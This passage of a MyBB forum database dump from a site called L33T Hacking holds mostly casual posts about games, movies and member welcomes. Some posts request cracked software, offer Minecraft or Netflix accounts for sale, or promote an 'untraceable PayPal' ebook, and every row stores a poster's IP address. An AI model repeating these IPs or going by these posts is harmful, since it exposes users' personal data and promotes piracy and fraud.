Batarangs in succession also works well, as you can throw at least two at a time, and it will not break a combo. Additionally, jump into the middle of enemies, and perform the Bat Swarm. [b]Harley Quinn pregnancy[/b] Go to the manager\'s office inside the Steel Mill. On the floor, next to the Harley Quinn costume, there is a positive pregnancy test. [b]Batman: Arkham City reference in Batman: Arkham Asylum[/b] In the Warden\'s Office in Batman: Arkham Asylum, go back to the room with the Warden\'s portrait on the far wall. Turn left as soon as you enter the doorway, and approach the wooden wall. You can destroy it with Explosive Gel. It may take a few tries, but one of the panels on the wooden wall can be destroyed. Beyond the wooden wall is an unmarked room with a blueprint on the wall. It shows plans for the relocation or expansion of Arkham to Gotham City. This is a reference to the setting of Batman: Arkham City. [b]Killer Croc reference[/b] After you defeat Ra\'s al Ghul and are leaving the subway tunnels, instead of going the correct way, backtrack until you find a gate blocking your path. You should see a button on the far wall and a gap in the iron bars. Throw the Batarang through the gap to hit the button. There will be a cutscene with Killer Croc. Note: You cannot reach this area again after this point in the game. [b]Lost reference[/b] During the second visit to the Steelmill, you will see The Joker on the large TV. He will start talking about TV shows, and say \"How come it all ended in a church,\" which is a reference to the TV show, Lost. [b]Scarecrow reference[/b] Note: To access this secret room, you must have the upgraded Cryptographic Sequencer with the \"TYGER\" codes installed. Just north of the Industrial District in the Harbord, glide onto the Falcone boat west of the two cranes hanging over the water -- where you do the first set of Augmented Reality challenges. Use the Cryptographic Sequencer to hack the door on the boat. Enter \"CityofTerror\" as a password to open the hatch on the boat. Inside are a bunch of containers with cockroaches on them and a dead inmate. There is also a shipping invoice for Dr. J. Crane (Scarecrow\'s real name), hinting that Scarecrow did survive the Killer Croc encounter.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '13aa0a4f794787df0a9faf5d5fec4349', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6827', '1146', '6789', '72', 'RE: DO NOT BUY NFS Most Wanted', '0', '5', 'Timmy', '1351749562', '[quote=\'Apathy\' pid=\'6789\' dateline=\'1351722443\'] Thanks for the warning/heads up. :) [/quote] No problem. Did you buy or pre-order it?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '19c2c4ba2e1986a6b0e4b36eb9173b21', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6828', '1168', '0', '73', 'Temple Run or Subway Surfer?', '0', '5', 'Timmy', '1351749623', 'Which one do you think is a better game, temple run or subway surfer? I vote for temple run.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd9ea096538b2b0a8af9b54cf07d758b4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6829', '966', '5441', '61', 'RE: [99$] Lots of money for anything FAST! [LEAKED]', '0', '228', 'VirtualLegend', '1351749644', 'Thanks for the share bro !!!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'b4ddbdae42aee5af0c0fbb446ba7de5d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6830', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '5', 'Timmy', '1351749674', 'Announcements section has 900 posts which means close to 1k', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '16e515f4b6e804057458c40c36926c27', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6831', '1155', '6738', '3', 'RE: Happy Halloween', '0', '5', 'Timmy', '1351749722', 'Happy Halloween everyone i think im late for us now :(', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '08c1dd76a8bcfa10bc4be358bc2abe92', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6832', '1153', '6780', '64', 'RE: Watch Prison Break full online for free', '0', '5', 'Timmy', '1351749785', 'Thanks for the link. I watched it already [quote=\'iTzIpod\' pid=\'6780\' dateline=\'1351715353\'] Thanks for the share! I\'ll share this with my friend who wants a Netflix account but won\'t buy it for $1.25 :p So I\'ll be nice and give him this link. [/quote] Lol good luck with selling netflix accounts.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '30b53a4c5d914f54e8081d670ee3cdb4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6833', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '5', 'Timmy', '1351749829', 'Welcome back. What happened to your site?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c1275ea7b2dbca5c9c7877e352a80447', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6834', '1133', '6672', '83', 'RE: [Tutorial] Cheating on tests', '0', '5', 'Timmy', '1351749886', '[quote=\'Apathy\' pid=\'6672\' dateline=\'1351599528\'] Or study and not possibly get a zero? [/quote] And let me be unique. Or just cheat and easy 100 :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3a7d213eab264f30eb50fa9a26509e31', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6835', '1139', '6666', '83', 'RE: [tutorial] How to bully and get away in US', '0', '5', 'Timmy', '1351749971', 'Thanks for this tutorial. [quote=\'PiXEL^OG\' pid=\'6666\' dateline=\'1351590319\'] You and this tutorial make me sick.. [/quote] It depends on how you take this i take it educationally because i learned abut a new rule in us.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '547b6e4587bf886a226b0c9c20a0acfb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6836', '1169', '0', '3', 'Computing Tab Forum Suggestions', '0', '1', 't3h jok3r', '1351750138', 'I\'m planning on adding a couple more sections under the Computing Tab so if you would like to see a section then post them below. If you have a section idea not for the computing tab then go ahead and post it. I will look over them and decide with NXK if they should be added or not.', '72.231.24.165', '1223104677', '1', '0', '1', '1351750157', '1', '46722d20668ed078948f25021eba7df9', '0', '1351750157'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6837', '1156', '6743', '64', 'RE: Walking dead', '0', '4', 'Triple H', '1351750256', 'thanks for the link but wrong section', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd3af15357fedb4f01e7b0fe347463d68', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6838', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '4', 'Triple H', '1351750350', 'I just got down watching tokyo drift and i watched fast five too today', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6439cb6dc6a824cfddc7c054d5c8ffab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6839', '1170', '0', '63', 'Need a sig', '0', '4', 'Triple H', '1351750388', 'I need a signature saying l33t hacking for myself', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4580c93fa1a32082c83634a2a13a2ce8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6840', '1171', '0', '33', 'Anyone have photoshop cracked?', '0', '4', 'Triple H', '1351750472', 'Anyone have photoshop cracked for me?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '31d69121ce30e2a5bee30ceca6a303f3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6841', '937', '5258', '19', 'RE: Nude Bot- Mr. Do you want to fap?', '0', '4', 'Triple H', '1351750663', 'AWESOME. Thank you for the link', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a2e5a435b3cef64f23427f67cb09d93c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6842', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '4', 'Triple H', '1351750798', 'I reached 100 posts finally :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b11b44002271dc3174f862b4d31ea7d3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6843', '1172', '0', '83', '[tut]How to knock someone out[/video]', '0', '4', 'Triple H', '1351751050', '[video=youtube]https://www.youtube.com/watch?v=VCarSRnquLM[/video] Enjoy!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6966a19c1360d1e7bb1139455760df87', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6844', '1172', '6843', '83', 'RE: [tut]How to knock someone out[/video]', '0', '257', 'XxTREYZxX', '1351751906', 'How come i cant watch this,it\'s just a white pic :O', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'd9b38b7f8cdba9bfc0e05d2ccccc5ab1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6845', '959', '5435', '9', 'RE: How to make $50+ / Day with AdFoc or Adfly', '0', '1', 't3h jok3r', '1351753069', '[quote=\'iTzIpod\' pid=\'5435\' dateline=\'1350595297\'] I know the creator of Customhits.net :3 Very nice method. Tried it. Didn\'t work :p Lool [/quote] It seriously didn\'t work or are you joking?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f526c1917ed4f21720e5d99ba8d57684', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6846', '1173', '0', '5', 'Request for LH staff', '0', '1', 't3h jok3r', '1351757796', 'Sup, I had a quick request. Can you guys please download the alexa toolbar or extension on your browsers and please visit LH everyday with the toolbar. This will increase our alexa ranking and will also get us more traffic.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '82dc80b8b478b2d50ecabb74a9fa3f93', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6847', '1165', '6833', '7', 'RE: I m Back on LH:)', '0', '54', 'Sin Cara', '1351757841', '[quote=\'Timmy\' pid=\'6833\' dateline=\'1351749829\'] Welcome back. What happened to your site? [/quote] The host is fucked up!!!', '119.154.66.74', '2006598218', '1', '0', '0', '0', '1', '02c62745f0fbd34133e6e696bfb64872', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6848', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '257', 'XxTREYZxX', '1351758151', 'I have never noticed you hello i am XxTREYZxX', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '2157c0a22a05d661b4fe849c8f6177e9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6849', '1168', '6828', '73', 'RE: Temple Run or Subway Surfer?', '0', '257', 'XxTREYZxX', '1351759279', 'I vote for subway surfer :L', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '4832a819b532f88a2183da742911c052', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6850', '1167', '6826', '75', 'RE: Batman Arkham City Cheats', '0', '257', 'XxTREYZxX', '1351759494', 'Thanks Timmy for these i was browsing the web for these,thanks', '203.104.11.6', '-882373882', '1', '0', '0', '0', '1', 'ac51fb1a5a6d650995099a04be3a62e1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6851', '1159', '6746', '74', 'RE: More minecraft acc that might work', '0', '82', 'iTzIpod', '1351769576', 'I do sell Minecraft Accounts (Premium) for $3.00/Account. o.O', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '036d41a090a84a20c403fd514c456dea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6895', '861', '6889', '7', 'RE: L33T Hacking Milestones', '0', '1', 't3h jok3r', '1351822928', '[quote=\'iTzIpod\' pid=\'6889\' dateline=\'1351802615\'] Thanks Trey. And \'you\'re\' not \'your\'. [/quote] I would recommend PMing him his grammar mistakes as constant can be considered an insult and if it\'s done privately then the poster would be more comfortable.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'dd82f2d2ff8641259a734569c7d1d2a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6853', '209', '819', '35', 'RE: Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '82', 'iTzIpod', '1351769651', 'Lol thanks for the bump. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a3f3d3a83c30e9c7c094e1595689f58d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6854', '1163', '6768', '35', 'RE: You Like it ? [ Rate My Graphic ]', '0', '82', 'iTzIpod', '1351769682', 'I see you added a background to it. Looks better than before ;P', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7c7eaee2dd6ff031a21eb3e269259354', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6855', '1155', '6738', '3', 'RE: Happy Halloween', '0', '82', 'iTzIpod', '1351769736', 'Didn\'t go trick or treating this year. I should go today! (November 1st) ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c0b87418d1752741cadf60261a5fa600', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6856', '1170', '6839', '63', 'RE: Need a sig', '0', '82', 'iTzIpod', '1351769795', 'Just L33tHacking? Or do you want it to say \'L33tHacking\' \'Triple H\' Or something?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9edbb25e8014d4b1bd95c7adad63b78f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6857', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1351769826', 'Congratulations on 100 posts. I reached 1400 posts today!', '24.212.197.164', '416597412', '1', '0', '82', '1351769836', '1', '6c1f9ee7eda51f712cfa7f61f6ed57df', '0', '1351769836'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6858', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '82', 'iTzIpod', '1351769881', 'Welcome back to L33tHacking. Hope you don\'t perform those actions like you did earlier.. t3h jok3r and I will be keeping an eye on you.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dcdabf9434e0aed27e755844fd630f38', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6859', '1168', '6828', '73', 'RE: Temple Run or Subway Surfer?', '0', '82', 'iTzIpod', '1351769920', 'I love Temple Run. :p Really fun and addictive.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ee8ac9544084aefa2d4139e2aa77b3f6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6860', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '205', 'mothered', '1351771980', 'I don\'t believe we\'ve met, so welcome back mate.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '3ba28a964cc890997dba04fcbb14333c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6861', '1145', '6709', '42', 'RE: Kim Kardashian Sex Tape (40 Mins - Warning 18+)', '0', '205', 'mothered', '1351772073', 'I haven\'t watched It, so It\'ll be Interesting to see what It contains. Cheers mate, thanks.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '1536eb23750a3c065dbdf3eecad7c746', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6862', '959', '5405', '9', 'RE: How to make $50+ / Day with AdFoc or Adfly', '0', '228', 'VirtualLegend', '1351774397', 'Great Method thanks for the share can you put some proof of your earnings', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'e42f83892308f618579f5624c3db6b37', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6863', '305', '1415', '84', 'RE: Themejunkies.net theme rip', '0', '228', 'VirtualLegend', '1351776556', '@t3h Jok3r F*king nice theme we need also a theme like this', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '1e25e10156257abff75b3efef8586fe3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6864', '595', '6838', '65', 'RE: What movie did you watch recently?', '0', '228', 'VirtualLegend', '1351779130', '[quote=\'Triple H\' pid=\'6838\' dateline=\'1351750350\'] I just got down watching tokyo drift and i watched fast five too today [/quote] Awesome movies i watched them last weekend the hole series', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'd8220f9d953aa1d3abefb01f88bcb49c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6865', '959', '5405', '9', 'RE: How to make $50+ / Day with AdFoc or Adfly', '0', '53', 'sirchamp', '1351779987', 'I tried this. It works but it\'s really slow. I made like 6 hits in 2hours. It isnt worth it.', '144.37.250.215', '-1876559145', '1', '0', '0', '0', '1', 'eb1154a055e0f91bf681ebac020bd909', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6866', '1174', '0', '47', '?? Untraceable PayPal + Never Get Limited Again + PP Secret ??', '0', '228', 'VirtualLegend', '1351791040', '[color=#32CD32][size=xx-large]Another Giveaway from Me Yeaaah :P[/size][/color] [color=#FFD700][size=large]Having a 100% anonymous (or close to it) PayPal account, and none of your activities being traceable. Sounds impossible? This E-book will make it possible for you... I\'m giving away a few Ebooks that are very handy to use. Like as the title says It\'s all about Paypal.[/size][/color] [color=#32CD32][size=medium][u][b]Information:[/b][/u][/size][/color] [color=#FFFFFF][size=medium]Amount of Ebooks: 2 Total Pages: 23 Pages VirusTotal: [url=https://www.virustotal.com/file/5a5ca277141e0075768c4af5137d07bf7d378471ee99072ea274c8697e816246/analysis/1351017118/]Click Here For The Scan Results[/url][/color] [color=#FFFFFF][size=medium]Download Link:[/size][/color] [url=http://adfoc.us/9383011646354][size=medium]Click Here To Download[/size][/url][/size] [align=center][color=#FFD700][size=x-large]HAVE FUN AND A QUICK THANK YOU IS ALWAYS APPRECIATED :D[/size][/color][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '96a8bf4652dc66b3b16a72536f4cf77a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6867', '1155', '6855', '3', 'RE: Happy Halloween', '0', '1', 't3h jok3r', '1351791724', '[quote=\'iTzIpod\' pid=\'6855\' dateline=\'1351769736\'] Didn\'t go trick or treating this year. I should go today! (November 1st) ;) [/quote] Lol good luck in that. You should go in Mcdonalds drive thru lol', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c8c315998e9bb8970f16bfc2f7f14146', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6868', '1165', '6858', '7', 'RE: I m Back on LH:)', '0', '1', 't3h jok3r', '1351792168', '[quote=\'iTzIpod\' pid=\'6858\' dateline=\'1351769881\'] Welcome back to L33tHacking. Hope you don\'t perform those actions like you did earlier.. t3h jok3r and I will be keeping an eye on you. [/quote] Now that\'s what you call a true bro. A tru bro knows what\'s his brow is doing :)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9cee1884ad2563e4a4a46a49c0cc3712', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6869', '1175', '0', '4', 'Me:3', '0', '265', 'Ryan', '1351792445', 'Ohaider guys im Ryan :) VirtualLegend Brought me here:)', '78.143.155.3', '1318034179', '0', '0', '0', '0', '1', '5b0a8effece9c9319e737e794d5c5d9b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6870', '1176', '0', '47', 'Free .asia domain', '0', '84', 'Thunder™', '1351792454', 'I didn\'t see this posted but http://adfoc.us/8446110728703 is having a LIMITED time offer. one .asia domain free. you don\'t need any credit card on file. just go there and make it. feel free to use it for any needs. you get the domain for one year free. enjoy guys and get it before it expires.', '111.91.75.189', '1868254141', '0', '0', '0', '0', '1', 'a3afeb4c1b695b41ac6e44d1b886536c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6871', '1175', '6869', '4', 'RE: Me:3', '0', '228', 'VirtualLegend', '1351792592', 'Welcome to LH wish you a good stay', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '51309aed3bf0b56b194ec8bf8c28b234', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6872', '1175', '6869', '4', 'RE: Me:3', '0', '1', 't3h jok3r', '1351792821', 'Welcome to L33T Hacking 